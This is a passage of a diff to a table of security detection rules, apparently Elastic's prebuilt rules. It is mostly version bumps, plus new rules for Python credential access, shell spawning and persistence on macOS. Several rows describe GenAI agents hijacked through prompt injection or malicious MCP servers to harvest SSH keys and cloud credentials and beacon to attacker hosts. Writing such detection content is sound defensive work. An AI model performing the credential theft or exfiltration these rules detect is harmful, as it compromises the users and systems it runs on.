[Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |317 @@ -936,7 +952,7 @@ and their rule type is `machine_learning`. |<> |Detects a file being made immutable using the chattr binary. Making a file immutable means it cannot be deleted or renamed, no link can be created to this file, most of the file's metadata can not be modified, and the file can not be opened in write mode. Threat actors will commonly utilize this to prevent tampering or modification of their malicious files or any system files they have modified for purposes of persistence (e.g .ssh, /etc/passwd, etc.). |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Data Source: Auditd Manager], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |217 -|<> |This rule identifies the execution of commands that can be used to delete files and directories. Adversaries may delete files and directories on a host system, such as logs, browser history, or malware. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |None |5 +|<> |This rule identifies the execution of commands that can be used to delete files and directories. Adversaries may delete files and directories on a host system, such as logs, browser history, or malware. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |None |6 |<> |Identifies the creation or execution of files or processes with names containing the Right-to-Left Override (RTLO) character, which can be used to disguise the file extension and trick users into executing malicious files. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |3 @@ -966,9 +982,15 @@ and their rule type is `machine_learning`. |<> |This rule detects the first time a principal calls AWS CloudFormation CreateStack, CreateStackSet or CreateStackInstances API. CloudFormation is used to create a collection of cloud resources called a stack, via a defined template file. An attacker with the appropriate privileges could leverage CloudFormation to create specific resources needed to further exploit the environment. This is a new terms rule that looks for the first instance of this behavior for a role or IAM user within a particular account. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: CloudFormation], [Use Case: Asset Visibility], [Tactic: Execution], [Resources: Investigation Guide] |None |6 +|<> |Detects the first time a Python process accesses sensitive credential files on a given host. This behavior may indicate post-exploitation credential theft via a malicious Python script, compromised dependency, or malicious model file deserialization. Legitimate Python processes do not typically access credential files such as SSH keys, AWS credentials, browser cookies, Kerberos tickets, or keychain databases, so a first occurrence is a strong indicator of compromise. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Resources: Investigation Guide], [Domain: LLM] |None |1 + +|<> |Detects the first time a Python process creates or modifies a LaunchAgent or LaunchDaemon plist file on a given host. Malicious Python scripts, compromised dependencies, or model file deserialization can establish persistence on macOS by writing plist files to LaunchAgent or LaunchDaemon directories. Legitimate Python processes do not typically create persistence mechanisms, so a first occurrence is a strong indicator of compromise. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend], [Resources: Investigation Guide], [Domain: LLM] |None |1 + +|<> |Detects the first time a Python process spawns a shell on a given host. Malicious Python scripts, compromised dependencies, or model file deserialization can result in shell spawns that would not occur during normal workflows. Since legitimate Python processes rarely shell out to interactive shells, a first occurrence of this behavior on a host is a strong signal of potential compromise. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend], [Resources: Investigation Guide], [Domain: LLM] |None |1 + |<> |An adversary with access to a compromised AWS service such as an EC2 instance, Lambda function, or other service may attempt to leverage the compromised service to access secrets in AWS Secrets Manager. This rule looks for the first time a specific user identity has programmatically retrieved a secret value from Secrets Manager using the GetSecretValue action. This rule assumes that AWS services such as Lambda functions and EC2 instances are setup with IAM role's assigned that have the necessary permissions to access the secrets in Secrets Manager. An adversary with access to a compromised AWS service would rely on its' attached role to access the secrets in Secrets Manager. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS Secrets Manager], [Tactic: Credential Access], [Resources: Investigation Guide] |None |318 -|<> |Detects DNS queries to commonly abused remote monitoring and management (RMM) or remote access software domains from processes that are not browsers. Intended to surface RMM clients, scripts, or other non-browser activity contacting these services. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Sysmon] |None |2 +|<> |Detects DNS queries to commonly abused remote monitoring and management (RMM) or remote access software domains from processes that are not browsers. Intended to surface RMM clients, scripts, or other non-browser activity contacting these services. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Sysmon] |None |3 |<> |Identifies the load of a driver with an original file name and signature values that were observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Defend] |None |11 @@ -976,7 +998,7 @@ and their rule type is `machine_learning`. |<> |Identifies a new credentials logon type performed by an unusual process. This may indicate the existence of an access token forging capability that are often abused to bypass access control restrictions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Windows Security Event Logs], [Resources: Investigation Guide] |None |110 -|<> |Adversaries may install legitimate remote monitoring and management (RMM) tools or remote access software on compromised endpoints for command-and-control (C2), persistence, and execution of native commands. This rule detects when a process is started whose name or code signature (or whose parent's name or code signature) resembles commonly abused RMM/remote access tools, including first-time-seen child processes of such tools. New Terms type: host has not seen this process (or child-of-RMM pattern) before within the configured history window. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Windows Security Event Logs], [Data Source: Sysmon] |None |115 +|<> |Adversaries may install legitimate remote monitoring and management (RMM) tools or remote access software on compromised endpoints for command-and-control (C2), persistence, and execution of native commands. This rule detects when a process is started whose name or code signature (or whose parent's name or code signature) resembles commonly abused RMM/remote access tools, including first-time-seen child processes of such tools. New Terms type: host has not seen this process (or child-of-RMM pattern) before within the configured history window. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Windows Security Event Logs], [Data Source: Sysmon] |None |116 |<> |Identifies newly seen removable devices by device friendly name using registry modification events. While this activity is not inherently malicious, analysts can use those events to aid monitoring for data exfiltration over those devices. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Exfiltration], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |212 @@ -996,7 +1018,7 @@ and their rule type is `machine_learning`. |<> |This detection correlates FortiGate's application control SOCKS events with Elastic Defend network event to identify the source process performing SOCKS traffic. Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. |[Domain: Endpoint], [OS: Linux], [OS: Windows], [OS: macOS], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend], [Data Source: Fortinet], [Resources: Investigation Guide] |None |2 -|<> |Detects when a FortiGate SSL VPN login event is followed by any SIEM detection alert for the same user name within a short time window. This correlation can indicate abuse of VPN access for malicious activity, credential compromise used from a VPN session, or initial access via VPN followed by post-compromise behavior. |[Use Case: Threat Detection], [Rule Type: Higher-Order Rule], [Tactic: Initial Access], [Data Source: Fortinet], [Resources: Investigation Guide] |None |1 +|<> |Detects when a FortiGate SSL VPN login event is followed by any SIEM detection alert for the same user name within a short time window. This correlation can indicate abuse of VPN access for malicious activity, credential compromise used from a VPN session, or initial access via VPN followed by post-compromise behavior. |[Use Case: Threat Detection], [Rule Type: Higher-Order Rule], [Tactic: Initial Access], [Data Source: Fortinet], [Resources: Investigation Guide] |None |2 |<> |This rule detects a FortiCloud SSO login followed by administrator account creation on the same FortiGate device within 15 minutes. This sequence is a high-confidence indicator of the FG-IR-26-060 attack pattern, where threat actors authenticate via SAML-based SSO bypass and immediately create local administrator accounts for persistence. |[Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Domain: Network], [Domain: Identity], [Data Source: Fortinet], [Data Source: Fortinet FortiGate] |None |1 @@ -1060,13 +1082,13 @@ and their rule type is `machine_learning`. |<> |Detects when macOS Gatekeeper is overridden followed by execution of the same binary from a suspicious location. This behavior indicates an attempt to bypass Apple's security controls and execute potentially malicious software downloaded from the internet. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |1 -|<> |Detects when GenAI tools access sensitive files such as cloud credentials, SSH keys, browser password databases, or shell configurations. Attackers leverage GenAI agents to systematically locate and exfiltrate credentials, API keys, and tokens. Access to credential stores (.aws/credentials, .ssh/id_*) suggests harvesting, while writes to shell configs (.bashrc, .zshrc) indicate persistence attempts. Note: On linux only creation events are available. Access events are not yet implemented. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Resources: Investigation Guide], [Domain: LLM], [Mitre Atlas: T0085], [Mitre Atlas: T0085.001], [Mitre Atlas: T0055] |None |3 +|<> |Detects when GenAI tools access sensitive files such as cloud credentials, SSH keys, browser password databases, or shell configurations. Attackers leverage GenAI agents to systematically locate and exfiltrate credentials, API keys, and tokens. Access to credential stores (.aws/credentials, .ssh/id_*) suggests harvesting, while writes to shell configs (.bashrc, .zshrc) indicate persistence attempts. Note: On linux only creation events are available. Access events are not yet implemented. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Resources: Investigation Guide], [Domain: LLM], [Mitre Atlas: T0085], [Mitre Atlas: T0085.001], [Mitre Atlas: T0055] |None |4 |<> |Detects when GenAI tools spawn compilers or packaging tools to generate executables. Attackers leverage local LLMs to autonomously generate and compile malware, droppers, or implants. Python packaging tools (pyinstaller, nuitka, pyarmor) are particularly high-risk as they create standalone executables that can be deployed without dependencies. This rule focuses on compilation activity that produces output binaries, filtering out inspection-only operations. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Auditd Manager], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Resources: Investigation Guide], [Domain: LLM], [Mitre Atlas: T0053] |None |1 |<> |Detects when GenAI tools connect to domains using suspicious TLDs commonly abused for malware C2 infrastructure. TLDs like .top, .xyz, .ml, .cf, .onion are frequently used in phishing and malware campaigns. Legitimate GenAI services use well-established domains (.com, .ai, .io), so connections to suspicious TLDs may indicate compromised tools, malicious plugins, or AI-generated code connecting to attacker infrastructure. |[Domain: Endpoint], [OS: macOS], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend], [Data Source: Sysmon], [Resources: Investigation Guide], [Domain: LLM], [Mitre Atlas: T0086] |None |1 -|<> |Detects GenAI tools connecting to unusual domains on macOS. Adversaries may compromise GenAI tools through prompt injection, malicious MCP servers, or poisoned plugins to establish C2 channels or exfiltrate sensitive data to attacker-controlled infrastructure. AI agents with network access can be manipulated to beacon to external servers, download malicious payloads, or transmit harvested credentials and documents. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend], [Resources: Investigation Guide], [Domain: LLM], [Mitre Atlas: T0086] |None |3 +|<> |Detects GenAI tools connecting to unusual domains on macOS. Adversaries may compromise GenAI tools through prompt injection, malicious MCP servers, or poisoned plugins to establish C2 channels or exfiltrate sensitive data to attacker-controlled infrastructure. AI agents with network access can be manipulated to beacon to external servers, download malicious payloads, or transmit harvested credentials and documents. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend], [Resources: Investigation Guide], [Domain: LLM], [Mitre Atlas: T0086] |None |4 |<> |Detects when GenAI processes perform encoding or chunking (base64, gzip, tar, zip) followed by outbound network activity. This sequence indicates data preparation for exfiltration. Attackers encode or compress sensitive data before transmission to obfuscate contents and evade detection. Legitimate GenAI workflows rarely encode data before network communications. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [OS: Windows], [Use Case: Threat Detection], [Tactic: Exfiltration], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Resources: Investigation Guide], [Domain: LLM], [Mitre Atlas: T0086] |None |1 @@ -1188,6 +1210,8 @@ and their rule type is `machine_learning`. |<> |Hping ran on a Linux host. Hping is a FOSS command-line packet analyzer and has the ability to construct network packets for a wide variety of network security testing applications, including scanning and firewall auditing. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Auditd Manager], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |212 +|<> |Generates a detection alert for each IBM QRadar offense written to the configured indices. Enabling this rule allows you to immediately begin investigating IBM QRadar offense alerts in the app. |[Data Source: IBM QRadar], [Use Case: Threat Detection], [Resources: Investigation Guide], [Promotion: External Alerts] |None |1 + |<> |Identifies when Internet Information Services (IIS) HTTP Logging is disabled on a server. An attacker with IIS server access via a webshell or other mechanism can disable HTTP Logging as an effective anti-forensics measure. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike] |None |316 |<> |This rule detects events that could be describing IPSEC NAT Traversal traffic. IPSEC is a VPN technology that allows one system to talk to another using encrypted tunnels. NAT Traversal enables these tunnels to communicate over the Internet where one of the sides is behind a NAT router gateway. This may be common on your network, but this technique is also used by threat actors to avoid detection. |[Tactic: Command and Control], [Domain: Endpoint], [Use Case: Threat Detection], [Data Source: PAN-OS], [Resources: Investigation Guide] |None |108 @@ -1214,7 +1238,7 @@ and their rule type is `machine_learning`. |<> |Identifies indirect command execution via Program Compatibility Assistant (pcalua.exe) or forfiles.exe. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Rule Type: BBR], [Data Source: Elastic Endgame], [Data Source: Windows Security Event Logs] |None |107 -|<> |Identifies downloads of executable and archive files via the Windows Background Intelligent Transfer Service (BITS). Adversaries could leverage Windows BITS transfer jobs to download remote payloads. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Command and Control], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |11 +|<> |Identifies downloads of executable and archive files via the Windows Background Intelligent Transfer Service (BITS). Adversaries could leverage Windows BITS transfer jobs to download remote payloads. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Command and Control], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |12 |<> |This rule detects potential initial access activity where an adversary uploads a web shell or malicious script to a web server via a file upload mechanism (e.g., through a web form using multipart/form-data), followed by a GET or POST request to access the uploaded file. By checking the body content of HTTP requests for file upload indicators such as "Content-Disposition: form-data" and "filename=", the rule identifies suspicious upload activities. This sequence of actions is commonly used by attackers to gain and maintain access to compromised web servers. |[Domain: Endpoint], [Domain: Web], [Domain: Network], [OS: Linux], [OS: Windows], [OS: macOS], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Persistence], [Data Source: Elastic Defend], [Data Source: Network Traffic], [Resources: Investigation Guide] |None |1 @@ -1258,7 +1282,7 @@ and their rule type is `machine_learning`. |<> |This detection rule identifies the usage of kexec, helping to uncover unauthorized kernel replacements and potential compromise of the system's integrity. Kexec is a Linux feature that enables the loading and execution of a different kernel without going through the typical boot process. Malicious actors can abuse kexec to bypass security measures, escalate privileges, establish persistence or hide their activities by loading a malicious kernel, enabling them to tamper with the system's trusted state, allowing e.g. a VM Escape. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Auditd Manager], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |112 -|<> |This rule detects the loading of a kernel module from an unusual location. Threat actors may use this technique to maintain persistence on a system by loading a kernel module into the kernel namespace. This behavior is strongly related to the presence of a rootkit on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Threat: Rootkit], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |1 +|<> |This rule detects the loading of a kernel module from an unusual location. Threat actors may use this technique to maintain persistence on a system by loading a kernel module into the kernel namespace. This behavior is strongly related to the presence of a rootkit on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Threat: Rootkit], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |2 |<> |Detects the use of the insmod binary to load a Linux kernel object file. Threat actors can use this binary, given they have root privileges, to load a rootkit on a system providing them with complete control and the ability to hide from security products. Manually loading a kernel module in this manner should not be at all common and can indicate suspicious or malicious behavior. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Threat: Rootkit], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Auditd Manager], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |216 @@ -1330,6 +1354,8 @@ and their rule type is `machine_learning`. |<> |This rule detects when a user creates a pod/container running in privileged mode. A highly privileged container has access to the node's resources and breaks the isolation between containers. If compromised, an attacker can use the privileged container to gain access to the underlying host. Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host. |[Data Source: Kubernetes], [Domain: Kubernetes], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |209 +|<> |Detects when secrets or configmaps are accessed, created, modified, or deleted in a Kubernetes cluster by the Azure Arc AAD proxy service account. When operations are routed through the Azure Arc Cluster Connect proxy, the Kubernetes audit log records the acting user as `system:serviceaccount:azure-arc:azure-arc-kube-aad-proxy-sa` with the actual caller identity in the `impersonatedUser` field. This pattern indicates that someone is accessing the cluster through the Azure ARM API rather than directly via kubectl against the API server. While legitimate for Arc-managed workflows, adversaries with stolen service principal credentials can abuse Arc Cluster Connect to read, exfiltrate, or modify secrets and configmaps while appearing as the Arc proxy service account in K8s audit logs. |[Data Source: Kubernetes], [Domain: Kubernetes], [Domain: Cloud], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Collection], [Resources: Investigation Guide] |None |1 + |<> |This rule detects the creation or modification of sensitive Kubernetes configuration files on Linux systems. These files include Kubernetes manifests, PKI files, and configuration files that are critical for the operation of Kubernetes clusters. Monitoring these files helps identify potential unauthorized changes or misconfigurations that could lead to security vulnerabilities in Kubernetes environments. Attackers may attempt to modify these files to gain persistence or to deploy malicious containers within the Kubernetes cluster. |[Domain: Endpoint], [Domain: Kubernetes], [Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |2 |<> |Detects a sequence where a principal creates or modifies a Role/ClusterRole to include high-risk permissions (e.g., wildcard access or escalation verbs) and then creates or patches a workload resource (DaemonSet, Deployment, or CronJob) shortly after, which may indicate RBAC-based privilege escalation followed by payload deployment. This pattern is often used by adversaries to gain unauthorized access to sensitive resources and deploy malicious payloads. |[Data Source: Kubernetes], [Domain: Kubernetes], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Persistence], [Resources: Investigation Guide] |None |1 @@ -1392,7 +1418,7 @@ and their rule type is `machine_learning`. |<> |This rule detects the creation of Loadable Kernel Module (LKM) configuration files. Attackers may create or modify these files to allow their LKMs to be loaded upon reboot, ensuring persistence on a compromised system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |6 -|<> |Identifies registry modification to the LocalAccountTokenFilterPolicy policy. If this value exists (which doesn't by default) and is set to 1, then remote connections from all local members of Administrators are granted full high-integrity tokens during negotiation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |317 +|<> |Identifies registry modification to the LocalAccountTokenFilterPolicy policy. If this value exists (which doesn't by default) and is set to 1, then remote connections from all local members of Administrators are granted full high-integrity tokens during negotiation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |318 |<> |Indicates the creation of a scheduled task. Adversaries can use these to establish persistence, move laterally, and/or escalate privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend], [Data Source: Sysmon], [Resources: Investigation Guide] |None |212 @@ -1414,7 +1440,7 @@ and their rule type is `machine_learning`. |<> |Identifies a new or modified federation domain, which can be used to create a trust between O365 and an external identity provider. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |212 -|<> |Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox rules process messages in the Inbox based on conditions and take actions. In this case, the rules will forward the emails to a defined address. Attackers can abuse Inbox Rules to intercept and exfiltrate email data without making organization-wide configuration changes or having the corresponding privileges. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Collection], [Resources: Investigation Guide] |None |212 +|<> |Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox rules process messages in the Inbox based on conditions and take actions. In this case, the rules will forward the emails to a defined address. Attackers can abuse Inbox Rules to intercept and exfiltrate email data without making organization-wide configuration changes or having the corresponding privileges. |[Domain: Cloud], [Domain: SaaS], [Domain: Email], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Configuration Audit], [Tactic: Collection], [Resources: Investigation Guide] |None |213 |<> |Identifies when a user creates a new inbox rule in Microsoft 365 that deletes or moves emails containing suspicious keywords. Adversaries who have compromised accounts often create inbox rules to hide alerts, security notifications, or other sensitive messages by automatically deleting them or moving them to obscure folders. Common destinations include Deleted Items, Junk Email, RSS Feeds, and RSS Subscriptions. This is a New Terms rule that triggers only when the user principal name and associated source IP address have not been observed performing this activity in the past 14 days. |[Domain: Cloud], [Domain: SaaS], [Domain: Email], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |3 @@ -1476,6 +1502,8 @@ and their rule type is `machine_learning`. |<> |Identifies search queries in SharePoint containing sensitive terms related to credentials, financial data, PII, legal matters, or infrastructure information. Adversaries who compromise user accounts often search for high-value files before exfiltration. This rule detects searches containing terms across multiple sensitivity categories, regardless of the access method (browser, PowerShell, or API). The actual search query text is analyzed against a curated list of sensitive terms to identify potential reconnaissance activity. |[Domain: Cloud], [Domain: SaaS], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Threat Detection], [Tactic: Discovery], [Tactic: Collection], [Resources: Investigation Guide] |None |1 +|<> |Identifies when a new SharePoint Site Administrator is added in Microsoft 365. Site Administrators have full control over SharePoint Sites, including the ability to manage permissions, access all content, and modify site settings. Adversaries who compromise a privileged account may add themselves or a controlled account as a Site Administrator to maintain persistent, high-privilege access to sensitive SharePoint data. This technique was notably observed in the 0mega ransomware campaign, where attackers elevated privileges to exfiltrate data and deploy ransom notes across SharePoint sites. |[Domain: Cloud], [Domain: SaaS], [Domain: Identity], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation], [Tactic: Persistence], [Resources: Investigation Guide] |None |1 + |<> |Identifies when a SharePoint or OneDrive site sharing policy is changed to weaken security controls. The SharingPolicyChanged event fires for many routine policy modifications, but this rule targets specific high-risk transitions where sharing restrictions are relaxed. This includes enabling guest sharing, enabling anonymous link sharing, making a site public, or enabling guest user access. Adversaries who compromise administrative accounts may weaken sharing policies to exfiltrate data to external accounts or create persistent external access paths. |[Domain: Cloud], [Domain: SaaS], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |1 |<> |Identifies file downloads or access from OneDrive or SharePoint using PowerShell-based user agents. Adversaries may use native PowerShell cmdlets like Invoke-WebRequest or Invoke-RestMethod with Microsoft Graph API to exfiltrate data after compromising OAuth tokens via device code phishing or other credential theft techniques. This rule detects both direct PowerShell access and PnP PowerShell module usage for file operations. FileAccessed events are included to detect adversaries reading file content via API and saving locally, bypassing traditional download methods. Normal users access SharePoint/OneDrive via browsers or sync clients, making PowerShell-based file access inherently suspicious. |[Domain: Cloud], [Domain: SaaS], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Threat Detection], [Tactic: Collection], [Tactic: Exfiltration], [Resources: Investigation Guide] |None |1 @@ -1550,9 +1578,9 @@ and their rule type is `machine_learning`. |<> |Identifies suspicious processes being spawned by the Microsoft Exchange Server worker process (w3wp). This activity may indicate exploitation activity or access to an existing web shell backdoor. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |313 -|<> |Identifies access to email resources via Microsoft Graph API using an first-party application on behalf of a user principal. This behavior may indicate an adversary using a phished OAuth refresh token or a Primary Refresh Token (PRT) to access email resources. The pattern includes requests to Microsoft Graph API endpoints related to email, such as /me/mailFolders/inbox/messages or /users/{user_id}/messages, using a public client application ID and a user principal object ID. This is a New Terms rule that only signals if the application ID and user principal object ID have not been seen doing this activity in the last 14 days. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Graph], [Data Source: Microsoft Graph Activity Logs], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide] |None |3 +|<> |Identifies access to email resources via Microsoft Graph API using an first-party application on behalf of a user principal. This behavior may indicate an adversary using a phished OAuth refresh token or a Primary Refresh Token (PRT) to access email resources. The pattern includes requests to Microsoft Graph API endpoints related to email, such as /me/mailFolders/inbox/messages or /users/{user_id}/messages, using a public client application ID and a user principal object ID. This is a New Terms rule that only signals if the application ID and user principal object ID have not been seen doing this activity in the last 14 days. |[Domain: Cloud], [Domain: Email], [Data Source: Azure], [Data Source: Microsoft Graph], [Data Source: Microsoft Graph Activity Logs], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide] |None |4 -|<> |This New Terms rule focuses on the first occurrence of a client application ID (azure.graphactivitylogs.properties.app_id) making a request to Microsoft Graph API for a specific tenant ID (azure.tenant_id) and user principal object ID (azure.graphactivitylogs.properties.user_principal_object_id). This rule may helps identify unauthorized access or actions performed by compromised accounts. Advesaries may succesfully compromise a user's credentials and use the Microsoft Graph API to access resources or perform actions on behalf of the user. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Graph], [Data Source: Microsoft Graph Activity Logs], [Resources: Investigation Guide], [Use Case: Identity and Access Audit], [Tactic: Initial Access] |None |5 +|<> |This New Terms rule focuses on the first occurrence of a client application ID (azure.graphactivitylogs.properties.app_id) making a request to Microsoft Graph API for a specific tenant ID (azure.tenant_id) and user principal object ID (azure.graphactivitylogs.properties.user_principal_object_id). This rule may helps identify unauthorized access or actions performed by compromised accounts. Advesaries may succesfully compromise a user's credentials and use the Microsoft Graph API to access resources or perform actions on behalf of the user. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Graph], [Data Source: Microsoft Graph Activity Logs], [Resources: Investigation Guide], [Use Case: Identity and Access Audit], [Tactic: Initial Access] |None |6 |<> |Identifies use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data 